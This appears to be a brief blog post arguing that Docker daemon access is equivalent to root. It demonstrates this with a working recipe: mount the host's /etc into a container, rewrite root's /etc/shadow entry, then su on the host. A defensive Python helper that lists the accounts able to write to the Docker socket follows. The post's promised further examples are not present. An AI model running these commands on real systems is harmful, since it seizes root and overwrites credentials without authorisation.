there are a lot of discussions regarding docker and its security features. there are two main aspects here:
in this post i'd like to quickly answer the 2nd question. just try this one out:
docker run -it --rm -v /etc/:/mnt debian:stable
# now inside the container, as root; /mnt is the host's /etc
sed -i 's#^root:.*#root:YOUR_PROPERLY_ENCODED_PASSWORD_GOES_HERE:0:0:99999:7:::#' /mnt/shadow
exit
# back on the host
su # type in your new password
and voila – you're root now.
how does it work? it's simple – we're mapping the content of /etc/ from the root filesystem (the docker daemon can access it) as /mnt inside our (temporary) container. inside the container, with root privileges, we edit the shadow file to set our own password.
is it the only way to go? definitely NO! some more examples follow:
…and probably many more like these. i think you get the point.
long story short – giving any user access to the docker daemon effectively means giving her root access.
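
to see who that already applies to on a host, one check is to work out which accounts can write to the daemon's unix socket. this is an added example, not code from the original post; the function names and the sample passwd/group data are constructed, and it assumes access is governed only by the socket's owner, group and mode (no tcp listener, acls or sudo rules).

```python
import stat

# constructed sample data (not from a real host); socket assumed root:docker
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
ci:x:1002:998::/home/ci:/bin/sh
"""
SAMPLE_GROUP = """\
root:x:0:
docker:x:998:alice
"""

def parse_passwd(text):
    """Return {username: (uid, primary_gid)} from passwd-format text."""
    users = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[2].isdigit() and f[3].isdigit():
            users[f[0]] = (int(f[2]), int(f[3]))
    return users

def group_members(text, gid):
    """Return the supplementary members that group-format text lists for gid."""
    members = set()
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[2] == str(gid):
            members.update(m for m in f[3].split(",") if m)
    return members

def daemon_users(passwd_text, group_text, sock_uid, sock_gid, sock_mode):
    """Accounts that can write to the docker socket, so are effectively root."""
    extra = group_members(group_text, sock_gid)
    allowed = []
    for name, (uid, gid) in parse_passwd(passwd_text).items():
        if uid == 0:                              # root bypasses mode bits
            ok = True
        elif uid == sock_uid:                     # owner class
            ok = bool(sock_mode & stat.S_IWUSR)
        elif gid == sock_gid or name in extra:    # group class, incl. primary gid
            ok = bool(sock_mode & stat.S_IWGRP)
        else:                                     # everyone else
            ok = bool(sock_mode & stat.S_IWOTH)
        if ok:
            allowed.append(name)
    return sorted(allowed)
```

on a live host, feed it the contents of /etc/passwd and /etc/group plus st_uid, st_gid and st_mode from os.stat() on the socket (commonly /var/run/docker.sock). note that "ci" shows up only through its primary gid, which a plain look at the docker line in /etc/group would miss.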